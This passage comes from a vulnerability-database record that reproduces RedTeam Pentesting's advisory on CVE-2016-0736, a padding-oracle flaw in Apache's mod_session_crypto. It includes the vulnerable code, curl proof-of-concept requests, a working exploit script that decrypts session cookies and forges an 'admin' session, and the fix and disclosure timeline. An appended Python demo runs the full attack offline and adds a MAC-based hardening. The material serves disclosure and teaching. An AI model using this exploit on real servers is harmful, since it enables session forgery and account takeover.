sys.argv[3]\r\n\r\n s = 
padbuster.encrypt(plaintext, block_size=16)\r\n\r\n data = b64encode(key+s[0:len(s)-16])\r\n print('Encrypted session:\\n%s' % data)\r\n else:\r\n print \"invalid mode\"\r\n sys.exit(1)\r\n------------------------------------------------------------------------\r\n\r\nThis Python script can then be used to decrypt the session:\r\n\r\n------------------------------------------------------------------------\r\n$ time python exploit.py decrypt sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4\\\r\nHztmf0CFsp1vpLQl1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYBRU=\r\nDecrypted session:\r\nb'username=guest×tamp=1453282205\\r\\r\\r\\r\\r\\r\\r\\r\\r\\r\\r\\r\\r'\r\n\r\nreal 6m43.088s\r\nuser 0m15.464s\r\nsys 0m0.976s\r\n------------------------------------------------------------------------\r\n\r\nIn this sample application, the username and a timestamp are included in\r\nthe session data. The Python script can also be used to encrypt a new\r\nsession containing the username \"admin\":\r\n\r\n------------------------------------------------------------------------\r\n$ time python exploit.py encrypt sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4\\\r\nHztmf0CFsp1vpLQl1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYB\\\r\nRU= username=admin\r\n\r\nEncrypted session:\r\nsxGTJsP1TqiPrbKVM1GAXPZQZNxCxjK938K9tufqX9xDLFciz7zmQ/GLFjF4pcXY\r\n\r\nreal3m38.002s\r\nusers0m8.536s\r\nsys0m0.512s\r\n\r\n------------------------------------------------------------------------\r\n\r\nSending this newly encrypted session to the server shows that the\r\nusername is now \"admin\":\r\n\r\n------------------------------------------------------------------------\r\n$ curl -b session=sxGTJsP1TqiPrbKVM1GAXPZQZNxCxjK938K9tufqX9xDLFciz7\\\r\nzmQ/GLFjF4pcXY http://127.0.0.1:8080/cgi-bin/status.rb\r\n\r\nyour username is admin\r\n------------------------------------------------------------------------\r\n\r\n\r\nWorkaround\r\n==========\r\n\r\nUse a different means to store the session, e.g. 
in a database by using\r\nmod_session_dbd.\r\n\r\n\r\nFix\r\n===\r\n\r\nUpdate to Apache HTTP version 2.4.25 (see [2]).\r\n\r\n\r\nSecurity Risk\r\n=============\r\n\r\nApplications which use mod_session_crypto usually store sensitive values\r\nin the session and rely on an attacker's inability to decrypt or modify\r\nthe session. Successful exploitation of the Padding Oracle vulnerability\r\nsubverts this mechanism and allows the construction of sessions with arbitrary\r\nattacker-specified content. Depending on the application this may\r\ncompletely subvert the application's security. Therefore, this\r\nvulnerability poses a high risk.\r\n\r\n\r\nTimeline\r\n========\r\n\r\n2016-01-11 Vulnerability identified\r\n2016-01-12 Customer approved disclosure to vendor\r\n2016-01-12 CVE number requested\r\n2016-01-20 Vendor notified\r\n2016-01-22 Vendor confirmed the vulnerability\r\n2016-02-03 Vendor provided patch\r\n2016-02-04 Apache Security Team assigned CVE number\r\n2016-03-03 Requested status update from vendor, no response\r\n2016-05-02 Requested status update from vendor, no response\r\n2016-07-14 Requested status update and roadmap from vendor\r\n2016-07-21 Vendor confirms working on a new release and inquired whether the\r\n patch fixes the vulnerability\r\n2016-07-22 RedTeam confirms\r\n2016-08-24 Requested status update from vendor\r\n2016-08-29 Vendor states that there is no concrete timeline\r\n2016-12-05 Vendor announces a release\r\n2016-12-20 Vendor released fixed version\r\n2016-12-23 Advisory released\r\n\r\n\r\nReferences\r\n==========\r\n\r\n[1] https://github.com/mwielgoszewski/python-paddingoracle\r\n[2] http://httpd.apache.org/security/vulnerabilities_24.html\n\n# 0day.today [2018-03-19] #", "sourceHref": "https://0day.today/exploit/26574", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "packetstorm": [{"lastseen": "2016-12-23T22:03:13", "description": "", "published": "2016-12-23T00:00:00", "type": 
"packetstorm", "title": "Apache mod_session_crypt 2.5 Padding Oracle", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-0736"], "modified": "2016-12-23T00:00:00", "id": "PACKETSTORM:140265", "href": "https://packetstormsecurity.com/files/140265/Apache-mod_session_crypt-2.5-Padding-Oracle.html", "sourceData": "`Advisory: Padding Oracle in Apache mod_session_crypto \n \nDuring a penetration test, RedTeam Pentesting discovered a Padding \nOracle vulnerability in mod_session_crypto of the Apache web server. \nThis vulnerability can be exploited to decrypt the session data and even \nencrypt attacker-specified data. \n \n \nDetails \n======= \n \nProduct: Apache HTTP Server mod_session_crypto \nAffected Versions: 2.3 to 2.5 \nFixed Versions: 2.4.25 \nVulnerability Type: Padding Oracle \nSecurity Risk: high \nVendor URL: https://httpd.apache.org/docs/trunk/mod/mod_session_crypto.html \nVendor Status: fixed version released \nAdvisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2016-001.txt \nAdvisory Status: published \nCVE: CVE-2016-0736 \nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0736 \n \n \nIntroduction \n============ \n \nThe module mod_session_crypto of the Apache HTTP Server can be used in \nconjunction with the modules mod_session and mod_session_cookie to store \nsession data in an encrypted cookie within the users' browsers. This \navoids server-side session state so that incoming HTTP requests can be \neasily distributed amongst a number of application web servers which do \nnot need to share session state. \n \n \nMore Details \n============ \n \nThe module mod_session_crypto uses symmetric cryptography to encrypt and \ndecrypt session data and uses mod_session to store the encrypted data in \na cookie (usually called \"session\") within the user's browser. The \ndecrypted session is then made available to the application in an \nenvironment variable (in case of a CGI script) or in a custom HTTP \nrequest header. 
The application can add a custom HTTP response header \n(usually \"X-Replace-Session\") which instructs the HTTP server to replace \nthe session's content with the value of the header. Detailed \ninstructions to set up mod_session and mod_session_crypto can be found \nin the documentation: \nhttps://httpd.apache.org/docs/2.4/mod/mod_session.html#basicexamples \n \nThe module mod_session_crypto is configured to use either 3DES or AES \nwith various key sizes, defaulting to AES256. Encryption is handled by \nthe function \"encrypt_string\": \n \nmodules/session/mod_session_crypto.c \n------------------------------------------------------------------------ \n/** \n* Encrypt the string given as per the current config. \n* \n* Returns APR_SUCCESS if successful. \n*/ \nstatic apr_status_t encrypt_string(request_rec * r, const apr_crypto_t *f, \nsession_crypto_dir_conf *dconf, const char *in, char **out) \n{ \n[...] \napr_crypto_key_t *key = NULL; \n[...] \nconst unsigned char *iv = NULL; \n[...] \n \n/* use a uuid as a salt value, and prepend it to our result */ \napr_uuid_get(&salt); \n \n[...] \n \nres = apr_crypto_passphrase(&key, &ivSize, passphrase, \nstrlen(passphrase), \n(unsigned char *) (&salt), sizeof(apr_uuid_t), \n*cipher, APR_MODE_CBC, 1, 4096, f, r->pool); \n \n[...] \n \nres = apr_crypto_block_encrypt_init(&block, &iv, key, &blockSize, r->pool); \n[...] \nres = apr_crypto_block_encrypt(&encrypt, &encryptlen, (unsigned char *)in, \nstrlen(in), block); \n[...] \nres = apr_crypto_block_encrypt_finish(encrypt + encryptlen, &tlen, block); \n[...] 
\n \n/* prepend the salt and the iv to the result */ \ncombined = apr_palloc(r->pool, ivSize + encryptlen + sizeof(apr_uuid_t)); \nmemcpy(combined, &salt, sizeof(apr_uuid_t)); \nmemcpy(combined + sizeof(apr_uuid_t), iv, ivSize); \nmemcpy(combined + sizeof(apr_uuid_t) + ivSize, encrypt, encryptlen); \n \n/* base64 encode the result */ \nbase64 = apr_palloc(r->pool, apr_base64_encode_len(ivSize + encryptlen + \nsizeof(apr_uuid_t) + 1) \n* sizeof(char)); \n[...] \nreturn res; \n} \n------------------------------------------------------------------------ \n \nThe source code shows that an encryption key is derived from the \nconfigured password and a randomly chosen salt by calling the function \n\"apr_crypto_passphrase\". This function internally uses PBKDF2 to derive \nthe key. The data is then encrypted and the salt and IV prepended to the \nencrypted data. Before returning to the caller, the result is encoded as \nbase64. \n \nThis procedure does not guarantee integrity of the ciphertext, so the \nApache module is unable to detect whether a session sent back to the \nserver has been tampered with. Depending on the application this often \nmeans that attackers are able to exploit a Padding Oracle vulnerability. \nThis allows decrypting the session and encrypting arbitrary data chosen \nby the attacker. \n \n \nProof of Concept \n================ \n \nThe vulnerability can be reproduced as follows. 
First, the modules \nmod_session, mod_session_crypto and mod_session_cookie are enabled and \nconfigured: \n \n------------------------------------------------------------------------ \nSession On \nSessionEnv On \nSessionCookieName session path=/ \nSessionHeader X-Replace-Session \nSessionCryptoPassphrase RedTeam \n------------------------------------------------------------------------ \n \nIn addition, CGI scripts are enabled for a folder and the following CGI \nscript is saved as \"status.rb\" and is made available to clients: \n \n------------------------------------------------------------------------ \n#!/usr/bin/env ruby \n \nrequire 'cgi' \n \ncgi = CGI.new \ndata = CGI.parse(ENV['HTTP_SESSION']) \n \nif data.has_key? 'username' \n  puts \n  puts \"your username is %s\" % data['username'] \n  exit \nend \n \nputs \"X-Replace-Session: username=guest&timestamp=\" + Time.now.strftime(\"%s\") \nputs \nputs \"not logged in\" \n------------------------------------------------------------------------ \n \nOnce the CGI script is correctly set up, the command-line HTTP client curl \ncan be used to access it: \n \n------------------------------------------------------------------------ \n$ curl -i http://127.0.0.1:8080/cgi-bin/status.rb \nHTTP/1.1 200 OK \nDate: Tue, 19 Jan 2016 13:23:19 GMT \nServer: Apache/2.4.10 (Ubuntu) \nSet-Cookie: session=sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4Hztmf0CFsp1vpLQ \nl1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYBRU=;path=/ \nCache-Control: no-cache \nSet-Cookie: session=sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4Hztmf0CFsp1vpLQ \nl1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYBRU=;path=/ \nTransfer-Encoding: chunked \nContent-Type: application/x-ruby \n \nnot logged in \n------------------------------------------------------------------------ \n \nThe example shows that a new encrypted cookie with the name \"session\" is \nreturned, and the response body contains the text \"not logged in\". 
\nCalling the script again with the cookie just returned reveals that the \nusername in the session is set to \"guest\": \n \n------------------------------------------------------------------------ \n$ curl -b session=sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4Hztmf0CFsp1vp\\ \nLQl1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYBRU= \\ \nhttp://127.0.0.1:8080/cgi-bin/status.rb \n \nyour username is guest \n------------------------------------------------------------------------ \n \nSending a modified cookie ending in \"u=\" instead of \"U=\" will invalidate \nthe padding at the end of the ciphertext, so the session cannot be \ndecrypted correctly and is therefore not passed to the CGI script, which \nreturns the text \"not logged in\" again: \n \n------------------------------------------------------------------------ \n$ curl -b session=sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4Hztmf0CFsp1vp\\ \nLQl1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYBRu= \\ \nhttp://127.0.0.1:8080/cgi-bin/status.rb \n \nnot logged in \n------------------------------------------------------------------------ \n \nThis verifies the existence of the Padding Oracle vulnerability. The \nPython library[1] python-paddingoracle was then used to implement \ndecrypting the session by exploiting the Padding Oracle vulnerability. 
\n \nexploit.py \n------------------------------------------------------------------------ \nfrom paddingoracle import BadPaddingException, PaddingOracle \nfrom base64 import b64encode, b64decode \nimport logging \nimport requests \nimport sys \n \nclass PadBuster(PaddingOracle): \n    def __init__(self, valid_cookie, **kwargs): \n        super(PadBuster, self).__init__(**kwargs) \n        self.wait = kwargs.get('wait', 2.0) \n        self.valid_cookie = valid_cookie \n \n    def oracle(self, data, **kwargs): \n        # Prepend the genuine cookie so salt, IV and a valid session stay in \n        # place; only the padding of the appended blocks decides the answer. \n        v = b64encode(self.valid_cookie+data) \n \n        response = requests.get('http://127.0.0.1:8080/cgi-bin/status.rb', \n                cookies=dict(session=v), stream=False, timeout=5, verify=False) \n \n        if 'username' in response.content: \n            logging.debug('No padding exception raised on %r', v) \n            return \n \n        raise BadPaddingException \n \nif __name__ == '__main__': \n    if not sys.argv[2:]: \n        print 'Usage: [encrypt|decrypt] <session value> <plaintext>' \n        sys.exit(1) \n \n    logging.basicConfig(level=logging.WARN) \n    mode = sys.argv[1] \n    session = b64decode(sys.argv[2]) \n    padbuster = PadBuster(session) \n \n    if mode == \"decrypt\": \n        # cookie layout: salt (16 bytes) | IV (16 bytes) | ciphertext \n        cookie = padbuster.decrypt(session[32:], block_size=16, iv=session[16:32]) \n        print('Decrypted session:\\n%r' % cookie) \n    elif mode == \"encrypt\": \n        key = session[0:16]  # the victim's salt, so the server derives the same key \n        plaintext = sys.argv[3] \n \n        s = padbuster.encrypt(plaintext, block_size=16) \n \n        data = b64encode(key+s[0:len(s)-16]) \n        print('Encrypted session:\\n%s' % data) \n    else: \n        print \"invalid mode\" \n        sys.exit(1) \n------------------------------------------------------------------------ \n \nThis Python script can then be used to decrypt the session: \n \n------------------------------------------------------------------------ \n$ time python exploit.py decrypt sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4\\ \nHztmf0CFsp1vpLQl1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYBRU= \nDecrypted session: \nb'username=guest&timestamp=1453282205\\r\\r\\r\\r\\r\\r\\r\\r\\r\\r\\r\\r\\r' \n \nreal 6m43.088s \nuser 0m15.464s \nsys 0m0.976s 
\n------------------------------------------------------------------------ \n \nIn this sample application, the username and a timestamp are included in \nthe session data. The Python script can also be used to encrypt a new \nsession containing the username \"admin\": \n \n------------------------------------------------------------------------ \n$ time python exploit.py encrypt sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4\\ \nHztmf0CFsp1vpLQl1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYB\\ \nRU= username=admin \n \nEncrypted session: \nsxGTJsP1TqiPrbKVM1GAXPZQZNxCxjK938K9tufqX9xDLFciz7zmQ/GLFjF4pcXY \n \nreal 3m38.002s \nuser 0m8.536s \nsys 0m0.512s \n \n------------------------------------------------------------------------ \n \nSending this newly encrypted session to the server shows that the \nusername is now \"admin\": \n \n------------------------------------------------------------------------ \n$ curl -b session=sxGTJsP1TqiPrbKVM1GAXPZQZNxCxjK938K9tufqX9xDLFciz7\\ \nzmQ/GLFjF4pcXY http://127.0.0.1:8080/cgi-bin/status.rb \n \nyour username is admin \n------------------------------------------------------------------------ \n \n \nWorkaround \n========== \n \nUse a different means to store the session, e.g. in a database by using \nmod_session_dbd. \n \n \nFix \n=== \n \nUpdate to Apache HTTP version 2.4.25 (see [2]). \n \n \nSecurity Risk \n============= \n \nApplications which use mod_session_crypto usually store sensitive values \nin the session and rely on an attacker's inability to decrypt or modify \nthe session. Successful exploitation of the Padding Oracle vulnerability \nsubverts this mechanism and allows the construction of sessions with arbitrary \nattacker-specified content. Depending on the application this may \ncompletely subvert the application's security. Therefore, this \nvulnerability poses a high risk. 
\n \n \nTimeline \n======== \n \n2016-01-11 Vulnerability identified \n2016-01-12 Customer approved disclosure to vendor \n2016-01-12 CVE number requested \n2016-01-20 Vendor notified \n2016-01-22 Vendor confirmed the vulnerability \n2016-02-03 Vendor provided patch \n2016-02-04 Apache Security Team assigned CVE number \n2016-03-03 Requested status update from vendor, no response \n2016-05-02 Requested status update from vendor, no response \n2016-07-14 Requested status update and roadmap from vendor \n2016-07-21 Vendor confirms working on a new release and inquired whether the \npatch fixes the vulnerability \n2016-07-22 RedTeam confirms \n2016-08-24 Requested status update from vendor \n2016-08-29 Vendor states that there is no concrete timeline \n2016-12-05 Vendor announces a release \n2016-12-20 Vendor released fixed version \n2016-12-23 Advisory released \n \n \nReferences \n========== \n \n[1] https://github.com/mwielgoszewski/python-paddingoracle \n[2] http://httpd.apache.org/security/vulnerabilities_24.html \n \n \nRedTeam Pentesting GmbH \n======================= \n \nRedTeam Pentesting offers individual penetration tests performed by a \nteam of specialised IT-security experts. Hereby, security weaknesses in \ncompany networks or products are uncovered and can be fixed immediately. \n \nAs there are only few experts in this field, RedTeam Pentesting wants to \nshare its knowledge and enhance the public knowledge with research in \nsecurity-related areas. The results are made available as public \nsecurity advisories. \n \nMore information about RedTeam Pentesting can be found at: \nhttps://www.redteam-pentesting.de/ \n \n-- \nRedTeam Pentesting GmbH Tel.: +49 241 510081-0 \nDennewartstr. 
25-27 Fax : +49 241 510081-99 \n52068 Aachen https://www.redteam-pentesting.de \nGermany Registergericht: Aachen HRB 14004 \nGesch\u00e4ftsf\u00fchrer: Patrick Hof, Jens Liebchen \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/140265/rt-sa-2016-001.txt"}]}
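The mechanics the advisories above describe (CBC with PKCS#7 padding, a key derived from the passphrase and a per-cookie salt, cookie = base64(salt || iv || ciphertext), no integrity check) and the attacker's trick of appending crafted blocks to a genuine cookie, as an added, self-contained example that is not code from Apache httpd, RedTeam Pentesting or python-paddingoracle. It runs offline: the server side is simulated in-process instead of through status.rb, a toy HMAC-SHA256 Feistel cipher stands in for AES (the attack does not depend on the cipher), PBKDF2-HMAC-SHA1 with 4096 iterations stands in for apr_crypto_passphrase, and the hardened variant adds an encrypt-then-MAC tag that is verified before any decryption; that mitigation is illustrative and is not the change Apache shipped in 2.4.25. All function names and the sample session value are assumptions of this example.

```python
# Added example, not code from Apache httpd or RedTeam Pentesting: a CBC padding-oracle attack
# (decrypt, then forge) on base64(salt || iv || ciphertext) cookies, beside an encrypt-then-MAC
# check that closes the oracle. Assumed stand-ins: an HMAC-SHA256 Feistel cipher for AES and
# PBKDF2-HMAC-SHA1/4096 for apr_crypto_passphrase; the MAC is illustrative, not Apache's patch.
import hashlib, hmac, os
from base64 import b64decode, b64encode
from functools import lru_cache
BLOCK, PASSPHRASE = 16, b"RedTeam"  # SessionCryptoPassphrase from the advisory's configuration
xor = lambda a, b: bytes(x ^ y for x, y in zip(a, b))
pad = lambda d: d + bytes([BLOCK - len(d) % BLOCK]) * (BLOCK - len(d) % BLOCK)  # PKCS#7
def unpad(data):  # the check whose outcome the vulnerable server leaks
    n = data[-1] if data else 0
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]

def block_cipher(key, blk, decrypt=False):  # toy 4-round Feistel on 16-byte blocks
    f = lambda rnd, half: hmac.new(key, bytes([rnd]) + half, hashlib.sha256).digest()[:8]
    l, r = blk[:8], blk[8:]
    for rnd in (reversed(range(4)) if decrypt else range(4)):
        l, r = (xor(r, f(rnd, l)), l) if decrypt else (r, xor(l, f(rnd, r)))
    return l + r

def cbc(key, iv, data, decrypt=False):
    out, prev = b"", iv
    for i in range(0, len(data), BLOCK):
        blk = data[i:i + BLOCK]
        cur = xor(block_cipher(key, blk, True), prev) if decrypt else block_cipher(key, xor(blk, prev))
        out, prev = out + cur, (blk if decrypt else cur)
    return out

@lru_cache(maxsize=None)  # one PBKDF2 per salt keeps the demo fast
def derive_key(salt):
    return hashlib.pbkdf2_hmac("sha1", PASSPHRASE, salt, 4096, 32)

# Server side: the vulnerable construction, and the same cookie with a MAC checked first.
def seal_session(plaintext, authenticated=False):
    salt, iv = os.urandom(16), os.urandom(BLOCK)
    body = salt + iv + cbc(derive_key(salt), iv, pad(plaintext))
    if authenticated:  # a real design would derive a separate MAC key
        body += hmac.new(derive_key(salt), body, hashlib.sha256).digest()
    return b64encode(body).decode()

def open_session(cookie, authenticated=False):  # session bytes, or None if the cookie is dropped
    raw = b64decode(cookie)
    if authenticated:
        raw, tag = raw[:-32], raw[-32:]
        if not hmac.compare_digest(hmac.new(derive_key(raw[:16]), raw, hashlib.sha256).digest(), tag):
            return None  # rejected before decryption, so padding is never inspected
    salt, iv, ct = raw[:16], raw[16:32], raw[32:]
    try:
        return unpad(cbc(derive_key(salt), iv, ct, True)) if ct and len(ct) % BLOCK == 0 else None
    except ValueError:
        return None

# Attacker side: only the server's accept/reject answer is used, never the key.
def make_oracle(valid_cookie, authenticated=False):
    valid = b64decode(valid_cookie)[:-32 if authenticated else None]
    def oracle(two_blocks):
        # The advisory's trick: append the crafted (prev, target) pair to the genuine cookie so
        # salt, IV and a plaintext containing "username" survive and only the last padding matters.
        got = open_session(b64encode(valid + two_blocks).decode(), authenticated)
        return got is not None and b"username" in got
    return oracle

def recover_intermediate(oracle, target):  # block_cipher(key, target, decrypt=True) via the oracle
    inter = bytearray(BLOCK)
    for pos in range(BLOCK - 1, -1, -1):
        padval = BLOCK - pos
        forged = bytearray(inter[j] ^ padval if j > pos else 0 for j in range(BLOCK))
        for guess in range(256):
            forged[pos] = guess
            if not oracle(bytes(forged) + target):
                continue
            if pos == BLOCK - 1 and not oracle(bytes(forged[:14]) + bytes([forged[14] ^ 1]) + bytes(forged[15:]) + target):
                continue  # accidental \x02\x02 (or longer) padding rather than \x01
            inter[pos] = guess ^ padval
            break
        else:
            raise RuntimeError("server never accepted a crafted block: no oracle")
    return bytes(inter)

def oracle_decrypt(oracle, cookie):
    raw = b64decode(cookie)
    blocks = [raw[i:i + BLOCK] for i in range(16, len(raw), BLOCK)]  # iv, c1, c2, ...
    return unpad(b"".join(xor(recover_intermediate(oracle, c), p) for p, c in zip(blocks, blocks[1:])))

def oracle_forge(oracle, cookie, plaintext):  # built backwards from a freely chosen last block
    ct, padded = bytes(BLOCK), pad(plaintext)
    for i in range(len(padded) - BLOCK, -1, -BLOCK):
        ct = xor(recover_intermediate(oracle, ct[:BLOCK]), padded[i:i + BLOCK]) + ct
    return b64encode(b64decode(cookie)[:16] + ct).decode()  # victim's salt, attacker's IV and ct

def demo():
    session = b"username=guest&timestamp=1453282205"  # constructed, as in the advisory
    cookie = seal_session(session)
    oracle = make_oracle(cookie)
    forged = oracle_forge(oracle, cookie, b"username=admin")
    hardened = make_oracle(seal_session(session, True), True)  # first attack step gets no signal
    resists = not any(hardened(bytes(15) + bytes([g]) + bytes(BLOCK)) for g in range(256))
    return {"decrypted": oracle_decrypt(oracle, cookie), "forged_session": open_session(forged),
            "hardened_resists": resists}
```

demo() decrypts the constructed guest session without knowing the passphrase, forges a cookie under the victim's salt whose session reads username=admin, and shows that against the MAC-protected cookie the very first attack step (finding a last byte the server accepts) never succeeds. Beyond the advisory's single case, recover_intermediate handles any number of ciphertext blocks and re-checks the last-byte hit against the one-in-256 false positive (a plaintext that happens to end in \x02\x02) that a naive oracle loop would mistake for \x01 padding.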